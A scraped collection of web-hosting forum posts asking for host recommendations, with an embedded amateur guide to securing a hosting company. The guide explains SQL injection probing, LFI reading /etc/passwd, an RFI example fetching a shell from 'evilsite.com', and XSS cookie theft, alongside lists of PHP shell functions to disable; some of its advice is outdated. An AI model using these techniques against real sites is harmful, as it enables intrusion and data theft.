Rebol Hosting Company
Jul 19, 2009I have tried Hostgator, Netfirms, UbiquityHosting, doesn't seem to allow to execute Rebol in cgi-bin
View 12 RepliesI have tried Hostgator, Netfirms, UbiquityHosting, doesn't seem to allow to execute Rebol in cgi-bin
View 12 RepliesIt's impossible to find a cheap webhosting service for Rebol, I found one which cost an awfull 20$ per month for 100 Mo 
So I'm thinking about taking a VPS but would like to share the cost by reselling some spaces. What would be the best Hosting Resellers for that, I mean with GOOD TECHNICAL SUPPORT KNOWLEDGE OF CGI INSTALL.
if i want to make image hosting such as allyoucanupload or imageshack , where hosting should i go to,... i was with hostgator and they suspended me for it.
View 14 Replies View RelatedI'm planning to launch an e-commerce website for photo and gift printing. I went on Google and found a few websites having Top 10 web hosting companies information. I am really confuse which one is the best for my website. 
I'm not sure how many users and traffic the website will get and don't want to pay extra $$$s for VPS or dedicated servers
I was wondering if you guys would recommend a hosting company to use a VPS? I am a web designer and as a side job i am thinking of selling reseller accounts for very cheap prices. I am mainly concerned mainly because of the RAM most VPS have . I mean is 248 and 512 mb really ok? Also , anyone have an insight on "burst ram"? What does this mean?
View 14 Replies View RelatedI will be starting up a new hosting company that will offer free and paid hosting. My question is, should I start out with a reseller, and move on as needed? I was simply thinking of starting out with a VPS, so I could simply skip the reseller part. I read elsewhere that some simply get a reseller and get another reseller when they need it.
What path should I choose. I could always get a VPS later on, but why not get one now? This is one reason I ask, because since reading about the reseller post, I am now split on this.
To note, have used a reseller before, but not a VPS. I do want to eventually learn to run a VPS, so this could be the time to do so.
I recently made a purchase of a really busy website and I need about 1024 Guaranteed Ram 20Gb+ disk space and 1000gb bandwidth VPS. 
Please make some suggestions based on:
1- Customer/Technical Support
2- Pricing
3- Their ability to maintain a good service at all times. 
we have about 10 servers in iweb.ca , iweb is good but account managers support are very poor ! for example when I need to upgrade my server I should contact my account manager and my account manager answer to my email after 2 weeks ! (if he answer)so I want to transfer my servers to another company , 
what's your suggestions ?
most of our servers are Linux.
P.S : we are Iranian
I've read articles that said it's generally bad to use the domain registrar as the hosting company(forgot the reason though)Right now I have some domains in Goddady and 1and1, and have a Hostgator account. I am thinking about just using Goddady's hosting service so I only need to manage my Goddady and 1and1 accounts instead of managing 3 accounts. 
I am going to use Wordpress.org to build the sites
I have recently built my first database application.I used SQL Server 2005 Express edition because it is free. The drawback is that it can only hold 4GB of data. But the database is also compatible with any SQL Server edition. 
I'm wondering what my options are - a lot of hosting companies seem to offer a greater storage capacity and then limit the actual size of the SQl database. i.e. 10GB of online diskspace with a 600MB SQL database. 
I have a dilemma now as I don't know which company is better to use for my needs- allwebnow.com or webhostgiant.com. 
I want to use shared hosting. 
I am in the process of creating a site for my family, which is spread out around the world. I am using Joomla and have built my site on Siteground as my host.
My site will have low traffic, for family only, but I want my family to be able to post pictures, chat and blog.
I am very happy with Siteground but it has come to my attention that even though they offer 750gb of space I can only have up to 5gb of picture files (gif, jpg, etc.) I feel that I will eventually exceed this and being new at the whole site creation, I do not want to risk data being lost (database, files, etc.) when the time comes to transfer to a new host.
The site is not active yet as I am still working out the kinks and adding more pages. I figure if I am going to make a move to another host now would be the best time.
So I guess the question I have is what hosts, in your opinions, would be the best for the site I explained and still be able to work in Joomla.
can any one recommend me a uk hosting company.
View 5 Replies View RelatedI wanted Media Temple's DV hosting for reselling, but, they don't provide Windows Hosting.   
So, which is the best Windows Host for reselling, around mt's DV pricing.
Is it Rackspace? or some other company?
I am very interested in web hosting and domain names and i would like to run my own small business web hosting company. I don't have large knowledge in this domain, but i found some reseller company e.g Hostgator. The process is buying some spaces and i resell them.
View 23 Replies View RelatedHostWW.net - quite nice and good so far (with Cpanel) and Resellerzoom.com still works.
View 6 Replies View Relatedi have website named almtechnology.com.now problem is that i have lost my hosting detail from where i have purchase.for eg i want to ask question about dns and email forwarding how i can ask my questions (submit ticket)to my hosting company how i know who is the company hosted my detail
View 3 Replies View RelatedI have an old domain thats hosted somewhere (cant remember the name of the hosting company)  I need to migrate/move that domain/host across to a new server but i dont have any details of my old/current hosting
Ive done a whois on it and all its giving me for dns is ns1.chost2.com
Can you tell me which company owns the above dns or how i can find out?
-= Securing Your Hosting Company =-
-- Credits: DeadlyData --
Part I. Your own websites  security.
 
The first step you always want to take to secure  your hosting company is to make sure your own website.
Is completely  secure some things to do if you are using a common CMS Google it with the word  exploit make sure your version is not on there.     
Next try any Get Vars in  your scripts and put a ' at the end of them what I mean is you have = you add '  so it's yourwebsite.com/page?=' or any other similar thing not only page= you  may also try char(39) rather then only ' most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments  out the ' but most PHP that only uses addslashes protection will still be vuln  to SQL injection simply using char(39) which the php script will read as  a  single quote. 
If you get an error you might want to check the script.  
 The errors you may receive are mysql_* this is a sql injection get right on  to fixing this because some one would have the ability of dumping your whole  database, clients, admins, etc. 
If the errors are main()or  include_failed you may have just found an LFI (Local File Inclusion) OR  RFI (Remote File Inclusion)... 
If it is in a path like failed to include  /test/file.ext ever then this is an LFI but is very useful to a hacker they have  the ability to use 
The following to browse into other places ../../../../ if  they wanted to they'd view your passwd file via  ../../../../../../etc/passwd  
Well right now you'd say big Woop they got some users maybe not but  still have the ability to go to any forum on 
that server and upload an  avatar with PHP-EXIF data in it then include it 
Using this LFI once they  have done this it will execute the code written in this LFI meaning they have  access to Run PHP-Code on your server now not good at  all...
Recommendations fix the script have mod security block all  ../../../../../ to a certain point attempts. 
Ok next were going to  discuss the abilities of an RFI and how to block it... 
So the things you can  do with an RFI well lets see remotely include an PHP file that will execute its  php file like so 
www.yoursite.com/file.php?file=evilsite.com/shell.txt?  this php file on your server would then remotely include the other file and  execute the PHP code also allowing the user access to your  server.
Prevention add http:// to your mod security this way when they  try remotely including a file in the URL
[url] mod_security will block it.
Ok our next subject is XSS this is a tricky  one on account of there are many ways around mod security blocking this...  
What can XSS do XSS means cross site scripting a hacker can execute  JavaScript code on your website using this some XSS is bad which would be called  permanent XSS it allows users to embed their JavaScript inside something where  you wouldn't really see it... but when you clicked they could potentially grab  your cookie or any current stored browser information. 
With this they could  use your cookie as their own to login as you... maybe even get password  information from this 
cookie...
Now the other type of XSS is  something you have to train your clients to look out for if some one ever asks  for help and sends you a link that is accessing a remote website in the URL such  as...  
www.mysite.com/info.php?xss=<script>src=[url]
Never click it what so ever... ban the person who has sent this. 
Ok  now for the mod_security bans... add <script> add <body= add  </script> add "> 
And this should fix your XSS problems that can  actually cause damage...
As for SQL injection the way to block this is  to... add ' or /* to the mod security be sure to add in char(39) as it's '  in php and php will in fact read it from a URL and interpret it as ' and still  launch the sql injection.
One other thing you can do that is not exactly  completely necessary but will help if any one does manage to get access to your  website.Is you can encrypt all your db.php/conf.php/ files so that hackers  cant read the information to gain access to your mysql database or gain any  other passwords/usernames you might commonly use more then once. 
     Zend should fix this problem. 
Never leave any open upload scripts what  so ever any open upload scripts left on your website will allow the  hacker/attacker the ability to upload a file sure you can restrict them to only  uploading JPG files or GIF,RAR etc.
But the only problem with that is unless  you customize your upload script to check for EXIF data and clear it out of an  image when uploading it then the hacker still has something to use against  you.
Part II. Your Employees
RULE-1 -PASSWORDS
Do  not use password even more then once on your servers if you do the first time  some one gets your password to any 
Thing they have the ability to get into  every thing on your server from there they get other peoples passwords and get  more and more access over time they can take the whole hosting  company...
RULE-2 -PHONE CHATS
Always request a person's information  verify every bit of it is correct also try to remember their voice because  hackers will call you and try to get into people servers they can have correct  information just by whoising the persons domain that their trying to  get.
RULE-3 -Email CHATS
This one is a bit easier there is no emotion  to what the person is trying to do...
If they slip up on one peace of  information be sure to email them back and ask them to correct it before even  
Sending any thing back or touching any thing.
RULE-4 -Talking to each  other
While talking to each other in public services.. or services  that my be able to be taped such as an IRC...
Be sure not to  mention any root passwords, client names, etc...
Part III. Securing Your Server
Ok well first were going to do the  obvious and CHMOD /home to 755
This is simple just go ahead and type  chmod 755 /home 
Or
CD  /
chmod 755 home
Next were going to make  sure no user has any bash access what so ever.
This may already be  setup by the current hosting control panel you are using...
If not were  going to nano /etc/passwd and make sure all Linux  users that you don't want having bash are set to 
/sbin/nologin
I realize some hosting companies also do  dedicated server companies so it wouldn't work out if your client didn't have  
bash to the server.
So this is mainly based for the shared hosting  servers.
Part IV. PHP  Configuration.
Now were going to  do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory  [:...]
safe_mode_exec_dir = directory [:...]
expose_php =  Off
register_globals =  Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,  
phpinfo,  popen, proc_open, base64_decode, base64_encodem, proc_terminate 
Some explanations of the functions your  disabling.
show_source(), Disables  functions most shells use to view the source of other files one commonly  
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral  overflows have been found while using PHPINFO() that  and you don't 
want people getting your version of PHP and etc. to attempt to  exploit it if you may just be out of date or to up to 
date.
system, Allows Bash Commands Via PHP
shell_exec, Allows Bash Commands via PHP
exec, Allows Bash Commands Via PHP
popen, Almost like Bash not quite but close using  PHP
proc_open, Almost like bash not quite but  close using PHP
base64_decode, decodes base64  encryptions... reason for disabling also allows users with server access to  bypass mod security
base64_encode, encodes  base64 encryptions... reason for disabling also allows users with server access  to bypass mod security
proc_terminate,  Terminates Processes running on the server.
Some reasons for having magic  quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL  injections.
Part V. MySQL and Apache Configurations
  
Disable all out bound MYSQL connections...
Besides from  Trusted Servers
This may actually be set in the host's field of the  users in the actual MYSQL table, for each user account it lets you 
Give them  an IP or type any I'd recommend giving them an IP...
Although when you give  them and IP don't worry it's not that you can only have one IP able to access  that user you 
do in fact have the ability to recreate the user
over and  over and fill in the IP field differently each time.
Next you need to configure your apache to where it runs 1 process  for each linux user and all scripts ran by that user run under their unix/linux  permissions,GID & UID
A reference Document on how to do this can  be found here.
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Comments:
What this will do with apache is pretty much  make sure that the users can't access other users directories on the 
Server  this is a common vulnerability you get access to one site on the server and you  get access to all websites on the same 
server... this protects against it.  All though apache is running under each user using SuEXEC would solve that  problem.
Part VI. SSH Keys.
    
It's not required but it is a  recommendation to setup SSH keys this way people do not have the ability to  brute force your SSH server.
A tutorial on how to do this can be  found here:
[url] 
If you do not wish to setup SSH Keys you may also use Linux  host.allow, host.deny files to sort which ranges have the ability to access your  server and which do not have the ability to access your server.
There  are some references for this located here 
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And  here 
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Part VII.   BackDoor-Trojan-Rootkit  Proctection  & FireWall  Setup
     
Down To The Back Door Protection 
In the even some one gets access to your server even with all the  security you've gotten so far they might just be able to figure out one way or  another to slip a backdoor in or in the case of ubiquity a botnet  client,
So what exactly are some things you can do to prevent this if  not stop it. 
Well I honestly don't think you can stop things like root kits,  Trojans, viruses, botnet clients etc. from being on your System.
But  you can stop or remove them once their on your system, or prevent them from  being ran. 
What all can a person do just by having the ability to upload a  file.
Not much but once they find ways to execute what they have uploaded  then you can pretty much consider them having root to your server.
At  this point they can run multiple exploits that may be able to BoF(Buffer Over  Flow) An process running under root on your system and from there they could get  lucky and have the ability to execute code as that process. 
Another thing they can do without having root is install an botnet  client once this is done they have the ability to use your servers as their own  resource to take other things down.
Trojans & Viruses on Linux  aren't too much of a worry as there aren't too many out there but the ones  that are made might just have enough access to delete most of the HDD on the  Linux system. 
Now a couple things I've researched on that can help prevent  this.
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Root Kit  Hunter.
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Description:
    Root  kit scanner is scanning tool to ensure you for about 99.9%* you're clean of  nasty tools. This tool scans for 
Root kits, backdoors and local exploits by  running tests like: 
    - MD5 hash compare
    - Look for default files used by root  kits
    - Wrong file permissions for binaries
    - Look for  suspected strings in LKM and KLD modules
    - Look for hidden files
    -  Optional scan within plaintext and binary files
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I highly recommend Root Kit Hunter.
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Clam Antivirus
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Description:
    
    * Command-line scanner
    *  Fast, multi-threaded daemon with support for on-access scanning
    * milter  interface for sendmail
    * advanced database updater with support for  scripted updates and digital signatures
    * virus scanner C library
     * on-access scanning (Linux and FreeBSD)
    * virus database updated  multiple times per day (see home page for total number of signatures)
    *  built-in support for various archive formats, including Zip, RAR, Tar, Gzip,  Bzip2, OLE2, Cabinet, CHM, 
BinHex, SIS and others
    * built-in support  for almost all mail file formats
    * built-in support for ELF executables  and Portable Executable files compressed with UPX, FSG, Petite, NsPack,  
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
     * built-in support for popular document formats including MS Office and Mac  Office files, HTML, RTF and PDF
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Honestly I'd recommend this even when using  Mod-Security I've built shells that will in fact bypass modsecurity well  
this well scan the source codes of the PHP shell
and make sure there�s  nothing that could potentially harm or allow the user to have to much access  over the system.
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Banning The Brute Forcers,  FTP, SSH, etc.
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APF (Advanced Policy  Firewall)
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Description: 
Rather then grabbing this one off their site I figured I'd write  one. 
        Well in my experience this is nothing like a normal firewall  you would use on an windows system it checks for things like people trying  to brute force Cpanel, SSH, FTP, etc. accounts.
      Allows alot of  configuration options some of which may also benfit in bandwidth saving and DDoS  prevention, 
      Over all it blocks those ports your not using so even if  some one manages to get an undetectable backdoor/botnet on your  systems.
      Then this will block it from connecting back to them and them  connecting back to it.
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I will  tell you no though this will be a pain to setup while hosting so many teamspeaks  on account of all the ports you would have to constantly forward.
To make  sure every one has the ability to get into their teamspeaks, 
Some commands that can be used with this Firewall just incase you  decide to use it.
Banning an IP
apf -d IP
        
Unbanning an  IP
apf -u IP
I recommend ignoring your own IP in the 
/etc/apf/allow_hosts.rules 
Using the following syntax you can ignore your IP from all firewall  rules meaning you don't follow them.
d=PORT:d=IP  // ENABLES YOUR IP COMMING  IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT
For ranges  you may do the following 192.168.1.1/255
It will then forward from  192.168.1.1 to 192.168.1.255 to be enabled
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Part VIII. DDoS Protection and Saving Bandwith + Remote  Loging.
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Server Monitoring  Remotely
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Log Watch
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Description: 
An application that runs twenty-four seven on your server and sends  the following things after going through them to your email.
       -Apache_Access Logs
      -Apache_Error Logs
      -SSH_LOGIN's Failed  Or Succeeded
      -FTP Logs
      -Mail Logs
      -Current HDD  Sizes
      -Kernel Logs
      -Mail Logs
      -Yum/APT-GET  Logs
Comments:
This thing is very useful  attempts to gain access to your server will be automatically emailed to you  along with every thing that is not found gave some one and forbidden error and  etc.
The only main requirement is that you have SendMail Running.
Mail Spam Protection
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Spam Assassin
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Description:
        
        The core distribution  consists of command line tools to perform filtering along with  Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in  a wide range of products.
Comments:
Never  used it my self because I've never really had to bad of mail spam problems on my  server but from what I've 
read it is in fact pretty good at filtering out  the spam in your emails.
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Some Extra Mail  Protection
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Be sure that your mail-server only allows your  Server to use it or any other servers you may trust and deny all  
others
many people will attempt to use open mail servers and spam  resources.
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DDoS Protection & Bandwidth  Saving.
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Ok first off some things people might do while  DDoSing you.
Unless theDDoS attack is very strong I highly doubt it will take your  whole server offline most DDoS attacks will mainly  hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it's a  little more difficult to stop without having to get all of your clients IP  addresses and adding them to the ignore lists in APF 
But a basic thing you can do is have APF installed drop all ICMP  packets. This will disable the ability to ping your server.
Next Install  DDoS Deflate
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DDoS Deflate
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Comments/Description:
From my own experience an well  written Perl Script that was made to run along with APF and monitor how many  times an 
IP is connected to your server before it bans it you may also run  it manually typing the following in shell.
        
        ddos Number Of Connections  Allowed 
When this is typed the Perl script will then run an netstat command check how many times each IP is connected  and if there are more then the number of connections you specified then it will  automatically run a command in APF for the IP to be  banned.
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More Information can be found on  this at
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Ok now for bandwidth saving and DDoS  protection at the same time there is this really cool thing made for apache servers it's called mod_evasive
It will limit the number of connections a  person may open with apache and if they open to many  it will ban them for what ever time you specify in the config.
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mod_evasive
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        Detailed Description:
         mod_evasive is an evasive maneuvers module for Apache to provide evasive action  in the event of an HTTP DoS or DDoS attack or brute force attack. It is also  designed to be a detection and network management tool, and can be easily  configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive  presently reports abuses via email and syslog facilities.
         Detection is performed by creating an internal dynamic hash table of IP  Addresses and URIs, and denying any single IP address from any of the  following:
       * Requesting the same page more than a few times per  second
       * Making more than 50 concurrent requests on the same child per  second
       * Making any requests while temporarily blacklisted (on a  blocking list) 
        This method has worked well in both single-server script  attacks as well as distributed attacks, but just 
like other evasive tools,  is only as useful to the point of bandwidth and processor consumption (e.g. the  amount of bandwidth and processor required to receive/process/respond to invalid  requests), which is why it's a good idea to integrate this with your firewalls  and routers for maximum protection.
        This module instantiates  for each listener individually and therefore has a built-in cleanup mechanism  and scaling capabilities. Because of this per-child design, legitimate requests  are never compromised (even from proxies and NAT addresses) but only scripted  attacks. Even a user repeatedly clicking on 'reload' should not be affected  
Unless they do it maliciously. mod_evasive is fully tweak able through the  Apache configuration file, easy to 
Incorporate into your web server, and  easy to use.
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This is a module I have  in fact used with Apache before it honestly can get annoying if you configure it  incorrectly 
because you will be simply visiting the website and get  banned.
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 --= That Will Cover Alot Of Security Issues =-
I have a question about web hosting companies.
If the company which I take my plan with it has been hacked or damaged. sorry about my English I don't know how to say that! 
Then What will I do?
is my website will gone?
My boss has recently asked me to source a new host for our servers.  At the moment we're running 8 Windows boxes but are unhappy with the service we're receiving from our hosting company.  We are looking for a managed hosting company, that has offices in the UK and US to look after the servers.  
At the moment we haven't nailed down our exact requirements so I'm just really looking for any recommendations you guys might have.  I've done a wee bit of Googling and have found a company called Rackspace but I'm ideally looking to contact around 5 companies to see who can offer us the best deal.
I'm looking for a dedicated hosting server to store more than 800GB in video. This video will not be played back, this place is just to store and where people can download.
As far as I can tell my only solutions is dedicated, but if anyone can offer me a better solution please let me know. Before I had this videos on different servers but the company does not allow me to keep them for storage.
I need to know the top 3 hosting companies in the US, and why you like them.
I like aplus.net but after doing some research I found out that this company is a nightmare.
Please, I need help really fast! Thank you all in advanced for your suggestions.
Let's say, I want to setup a hosting company in 3 different location (US, EU, ASIA) and I want to host 3 different servers on each datacenter. They will not be cluster. Customers will have an option to chose their datacenter location on the ordering page. But I want to use only one IP block /24 for all 3 different location. 
Is it possible?
I currently own my own hosting company using another companies servers, which is good, and I've learned a lot of the ins and outs of hosting, but there's a great deal I need to learn before I start Hosting using my own servers. Can anyone provide some good resources or books that might help me get on with my mission?
View 5 Replies View RelatedI switch from Hostway about a month ago.
ThisWebHost has a price plan suitable for any hosting need (I saved over 50% from what I was paying previously, because the other pricing plan was richer than what I needed).
ThisWebHost only charges $1 per month for a dedicated IP address and has superior customer service (very timeline response once you open a ticket) and is also accessible on Twitter. Added bonus is that their CS is located in the US and they speak English.
Another huge perk was that they transferred my site for free.
So far up time has been 100%.
if I should get my domain separately from my hosting company. I'm going to buy a host gator hosting plan and I don't know if I should get my domain from them too? They charge $15/year for domains. My only problem is that if I have to leave from host gator in less than a year for some reason, will I be able to go to another hosting company and have the same domain name as I had with host gator?
View 14 Replies View RelatedIf your about to start up your own hosting company i would reccomend JustGotVPS.com there staff are VERY helpfull and quick support staff times. Cheap VPS's that are genuin i am currently running one of there top end ones with Cpanel with no problem. I would like to point out i have nothing to do with JustGotVPs.com i am writing this because of there great service and Admin support. I reccomend if your on a reseller to get one of these VPS's.
View 0 Replies View RelatedI run a Travel and Tourism Agency and plan to host my website online so that my potential customers will be able to book tickets, reserve hotel rooms, rent cars etc. My website will be built using PHP with MySQL at the backend. I plan on targeting mainly customers within the UK at first but will expand soon.
I expect to be getting around 10,000 visitors a month to start with and will expand rapidly. What Webhost should I be looking at? What are the things that I need to look out for specifically? Should I go for Shared or VPS?
I’m not sure this I the right place to post this, but since I’ll need also a dedicated server I guess it is (I’m sorry if it’s not).
Hi to you all. 
I’m developing my own site. This will be my very first time building and managing a site, so I’m for sure a noob on this type of stuff (but I have a good general knowledge on computers (I build my own computers and solve every problem I encounter)).
The site will be managed by joomla 1.5 plus a phpbb3 forum (maybe vbulleting in the future). Obviously when my site is completed and published on the net I’ll have zero members, but I hope to see this number increase (lol…from 0 members it isn’t a hard thing to accomplish…I guess ).
Having a really low number of members and visitors I think that I’ll start from a shared hosting plan (or VPS) and then go up to a dedicated server (when I’ll need it…I hope soon )….probably a managed dedicated server since I don’t know much of the technicalities needed to manage a dedicated server.
This being said, I would prefer to go for a good hosting company (cheap…but reliable) that has both shared and dedicated hosting plans so when I’ll have to upgrade (from shared/VPS to dedicated) everything will be smoothly managed by them.
The site/forum aims to have a large community, a good n° of hosted files (images and mp3’s (recorded voice) ---> everything legal!)
What hosting company would you suggest?
Is it possible to have the site on one server and the forum on another? (considering that the forum will be integrated in the joomls CMS with a bridge).
I own a small company specializing in the production of science education videos we sell to public schools. We would like to begin to deliver our videos to schools over the Internet. Our collection includes about two thousand video clips with accompanying metadata. We hope to gradually build a customer base of several hundred schools by June 2009. I need advice on how to find a good company that offers the colocation server option, and I need to know what kinds of questions to ask when shopping for a company.
View 2 Replies View RelatedI am interested as I am sure others are as well in the results. Please also list things you want to see providers that they are missing the boat on now. Please dont mention specific providers and make this a bash session. I think this type of dialoge will benefit  all the providers out there.
This was supposed to have a poll but my laptop died before I could post the poll questions
What is most important to you in a dedicated hosting company?
#1 Price
#2 Support
#3 Network
#4 Client User interface